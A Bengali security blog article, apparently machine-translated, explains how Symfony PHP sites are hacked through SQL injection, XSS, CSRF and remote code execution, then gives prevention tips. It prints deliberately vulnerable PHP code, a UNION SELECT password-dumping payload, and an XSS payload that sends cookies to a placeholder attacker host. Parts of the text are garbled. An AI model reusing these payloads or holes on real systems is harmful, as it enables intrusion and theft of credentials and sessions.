সিমফনি একটি জনপ্রিয় পিএইচপি ফ্রেমওয়ার্ক যা ব্যবহারকারীদের জন্য পিএইচপি ওয়েবসাইট এবং ওয়েব অ্যাপ্লিকেশন তৈরি করা সহজ করে তোলে। অতীতে, সিমফনি ফ্রেমওয়ার্কের ত্রুটির কারণে ড্রুপাল আক্রান্ত হওয়ার ঘটনা ঘটেছে। শেষ পর্যন্ত, এই সীমফনি ওয়েবসাইট হ্যাক হয়. যদিও এটি মাঝে মাঝে সিমফনি ফ্রেমওয়ার্কের একটি ত্রুটি ছিল, তবে অনিরাপদ উন্নয়ন অনুশীলনগুলিও আপনার পিএইচপি ওয়েবসাইটকে দুর্বল করে তোলে। এই নিবন্ধটির মাধ্যমে, আপনি শিখবেন কী কী গুরুতর দুর্বলতা যা Symfony ওয়েবসাইট হ্যাক হতে পারে এবং কীভাবে সেগুলি প্রতিরোধ করা যায়৷
সিমফনির জনপ্রিয়তাকে দায়ী করা যেতে পারে যে এটি ডিকপল এবং ব্যবহারযোগ্য পিএইচপি লাইব্রেরির একটি সেট সরবরাহ করে। এই লাইব্রেরিগুলি বিকাশকে ত্বরান্বিত করতে পারে এবং এটিকে সম্পূর্ণভাবে সহজ করে তুলতে পারে। যাইহোক, শুধুমাত্র সিমফনি ফ্রেমওয়ার্ক ব্যবহার করে আপনার পিএইচপি ওয়েবসাইট সুরক্ষিত করা যাবে না। কনট্রাস্ট সিকিউরিটি থেকে তথ্য অনুযায়ী,
Symfony ওয়েবসাইট হ্যাক হয়েছে:লক্ষণগুলি
- ডাটাবেসের মধ্যে সন্দেহজনক টেবিল, অজানা ব্যবহারকারী এবং সিস্টেমে অজানা ফাইলগুলি সিমফনি এসকিউএল ইনজেকশনের লক্ষণ হতে পারে৷
- পপ-আপ এবং বিজ্ঞাপনগুলি ফিশ ডোমেনে রিডাইরেক্ট করা সিমফনি রিমোট কোড এক্সিকিউশনের ফল হতে পারে৷
- ব্যবহারকারীরা আপনার সাইটে তাদের বৈধতা ছাড়াই অ্যাকাউন্ট মুছে ফেলা বা ডেটা ম্যানিপুলেশন সম্পর্কে অভিযোগ করলে, এটি সিমফনি ক্রস-সাইট অনুরোধ জালিয়াতির কারণে হতে পারে।
- সিমফনি সংরক্ষিত ক্রস-সাইট স্ক্রিপ্টিংয়ের কারণে আপনার সাইটে বিভ্রান্তিকর বিষয়বস্তু প্রদর্শিত হয়৷
- সমস্ত Symfony ওয়েবসাইট হ্যাক হওয়ার ফলে, সার্চ ইঞ্জিন ব্যবহারকারীদেরকে আপনার সাইট দেখার বিরুদ্ধে সতর্ক করে৷
Symfony ওয়েবসাইট হ্যাক হওয়ার কারণ
Symfony ওয়েবসাইট হ্যাক হয়েছে:SQL ইনজেকশন
সিমফনি এসকিউএল ইনজেকশন হল এক ধরনের আক্রমণ যা মূলত আপনার সাইটের ডাটাবেসকে লক্ষ্য করে। ব্যবহারকারীর ইনপুট স্যানিটাইজেশনের অভাব সাইটটিকে অরক্ষিত করে তোলে যার ফলে সিমফনি ওয়েবসাইট হ্যাক হয়ে যায়। উদাহরণস্বরূপ, নীচের কোডটি দেখুন:
<?php $query = "SELECT id, name, inserted, size FROM products WHERE size = '$size'"; $result = odbc_exec($conn, $query); ?> এটি একটি এসকিউএল ক্যোয়ারী চালানোর জন্য একটি সাধারণ পিএইচপি কোডের মত দেখাচ্ছে কিন্তু, আক্রমণকারী SELECT SQL কমান্ড ব্যবহার করে ডাটাবেস থেকে সমস্ত পাসওয়ার্ড প্রকাশ করতে এটি ব্যবহার করতে পারে। $size ভেরিয়েবলে প্রদত্ত ইনপুট এমন কিছু দেখাবে:
'union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from user;-- কার্যকর করার পরে এই বিবৃতিটি ব্যবহারকারী নামের টেবিল থেকে সমস্ত পাসওয়ার্ড তালিকাভুক্ত করতে পারে। এই বিবৃতির শেষে '—' চিহ্নগুলি কোনও ত্রুটি এড়াতে এই লাইনের বাকি কোডটিকে মন্তব্যে পরিণত করবে। এটি একটি ছোট উদাহরণ, আক্রমণকারীরা এটিকে বিভিন্ন উপায়ে ব্যবহার করতে পারে আপনার ডেটাবেসকে ম্যানিপুলেট করতে, সম্পাদনা করতে এবং এমনকি মুছে ফেলতে। কিছু Symfony ওয়েবসাইট হ্যাক করা ক্ষেত্রে, SQLi একটি বিপরীত শেল পেতেও ব্যবহার করা যেতে পারে। Symfony ওয়েবসাইট হ্যাক হয়েছে:ক্রস-সাইট স্ক্রিপ্টিং
XSS হল একটি ব্যাপকভাবে পাওয়া দুর্বলতা যা সঠিক ব্যবহারকারীর ইনপুট স্যানিটাইজেশনের অভাবের কারণে ঘটে। এই দুর্বলতা সাধারণত সার্চ বক্স, মেসেজ বোর্ড ইত্যাদিতে পাওয়া যায়। XSS-এর কারণে হ্যাক হওয়া একটি Symfony ওয়েবসাইট আক্রমণকারী কুকিজ চুরি করতে ব্যবহার করতে পারে এবং এইভাবে সেশনটি দখল করতে পারে। উদাহরণস্বরূপ, নিম্নলিখিত কোডের সাথে একটি অনুসন্ধান ক্যোয়ারী তৈরি করা আক্রমণকারীকে যে কেউ এটিতে ক্লিক করে তার কুকিগুলি চুরি করার অনুমতি দিতে পারে৷
"><SCRIPT>var+img=new+Image();img.src="https://hacker/"%20+%20document.cookie;</SCRIPT> এখানে '>' অক্ষরটি আগের ট্যাগগুলি বন্ধ করবে। তারপরে, ইমেজ() কনস্ট্রাক্টর 'img' ভেরিয়েবলে একটি নতুন ইমেজ তৈরি করবে। পরবর্তী লাইনটি ছবির উৎস নির্ধারণ করবে এবং একই লাইনে, সেশন টেকওভারের জন্য কুকি পেতে document.cookie পদ্ধতি ব্যবহার করা হবে। যদি XSS সংরক্ষিত বা অবিরাম থাকে তবে এটি আরও বিপজ্জনক কারণ এই স্ক্রিপ্টটি স্বয়ংক্রিয়ভাবে কুকি চুরি করবে যখন কেউ সংক্রামিত পৃষ্ঠাটি খুলবে। যেখানে, প্রতিফলিত XSS সামাজিক প্রকৌশল আক্রমণের উপর নির্ভর করে। শুধু কুকি চুরিই নয়, XSS-এর কারণে হ্যাক হওয়া Symfony ওয়েবসাইটও সব ধরনের ফিশিং আক্রমণের জন্য ব্যবহার করা যেতে পারে!আপনার হ্যাক হওয়া Symfony ওয়েবসাইট মেরামতের জন্য সাহায্যের প্রয়োজন? এখনই আপনার সাইট পরিষ্কার করুন
সিমফনি ওয়েবসাইট হ্যাক হয়েছে:ক্রস-সাইট অনুরোধ জালিয়াতি
CSRF আক্রমণকারীরা আপনার শিকারদের অ্যাকাউন্ট মুছে ফেলা, ব্যবহারকারীর ডেটা ম্যানিপুলেট করা ইত্যাদির মতো অবাঞ্ছিত কাজগুলি করতে ব্যবহার করতে পারে৷ উদাহরণস্বরূপ, যখন কোনও ব্যবহারকারী আপনার সাইটে লগ ইন করেন, তখন নীচে দেওয়া একটির মতো একটি বিশেষভাবে তৈরি করা পৃষ্ঠাটি দেখার ফলে মুছে ফেলা হতে পারে৷ হিসাব.
এই পৃষ্ঠাটি ব্যবহারকারীর অ্যাকাউন্ট মুছে ফেলার জন্য অ্যাকশনের 'মুছুন' মান ব্যবহার করবে। যদিও আক্রমণকারী বিভিন্ন আক্রমণ পরিচালনা করার জন্য CSRF ব্যবহার করতে পারে তবে তার সফলভাবে চালানো হয়েছে তা দেখার জন্য তার জন্য কোন ব্যবস্থা নেই। সিমফনি ওয়েবসাইট হ্যাক হয়েছে:রিমোট কোড এক্সিকিউশন
দুর্বল কোডিং মানের কারণে সিম্ফনি ব্যবহার করে ওয়েবসাইটগুলিতে দূরবর্তী কোড এক্সিকিউশন ঘটে। উপরের সমস্ত আক্রমণের মধ্যে সবচেয়ে বড় নিরাপত্তা সমস্যা হল ব্যবহারকারীর ইনপুটকে বিশ্বাস করা। উদাহরণস্বরূপ, পিএইচপি কোডে eval() ফাংশনের দুর্বল ব্যবহার এইরকম দেখাবে:
$myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;"); এটি বেশ সহজ কোড বলে মনে হচ্ছে যা আর্গুমেন্টগুলি গ্রহণ করবে এবং পিএইচপি কোড হিসাবে স্ট্রিংটি চালানোর জন্য ইভাল ফাংশন ব্যবহার করবে। কিন্তু যেহেতু ইনপুট ফিল্টার করা হয় না, আক্রমণকারী কিছু মান সরবরাহ করতে পারে যেমন /index.php?arg=1; phpinfo() যা phpinfo() ফাংশনের কোড এক্সিকিউশনের দিকে নিয়ে যাবে। 
সিমফনি ওয়েবসাইট হ্যাক হয়েছে:নিরাপদ উন্নয়ন অনুশীলন
- আপনার Symfony ওয়েবসাইটে SQLi আক্রমণ প্রতিরোধ করতে, প্রস্তুত বিবৃতি ব্যবহার করুন৷
- আপনার Symfony ওয়েবসাইটে XSS আক্রমণ প্রতিরোধ করতে, htmlspecialchars() ফাংশনটি ব্যবহার করুন যখনই ব্রাউজারে একটি আউটপুট হিসাবে প্রদর্শিত হওয়ার জন্য কোনও ব্যবহারকারীর ইনপুট প্রয়োজন হয় তখন এটি প্রয়োগ করুন৷
- এইভাবে CSRF আক্রমণ এড়াতে পৃষ্ঠায় লুকানো একটি র্যান্ডম টোকেন প্রয়োগ করুন:<ইনপুট টাইপ="লুকানো" নাম="csrf" মান="”>
- RCE প্রতিরোধ করতে php.ini ফাইলে এই PHP নির্দেশের মাধ্যমে সমস্ত বিপজ্জনক ফাংশন নিষ্ক্রিয় করুন:disable_functions =“show_source, system, shell_exec, passthru, exec, popen, proc_open, allow_url_fopen, eval”
- সুতরাং মূল বিষয় হল আপনার সিমফনি ওয়েবসাইটে ব্যবহারকারীর ইনপুটকে বিশ্বাস না করে বেশিরভাগ দুর্বলতা এড়ানো যায়।
- আপনার ওয়েবসাইটে কোনো দুর্বলতা লুকিয়ে থাকতে পারে সন্দেহ হলে সম্পূর্ণ নিরাপত্তা অডিটের জন্য যান।
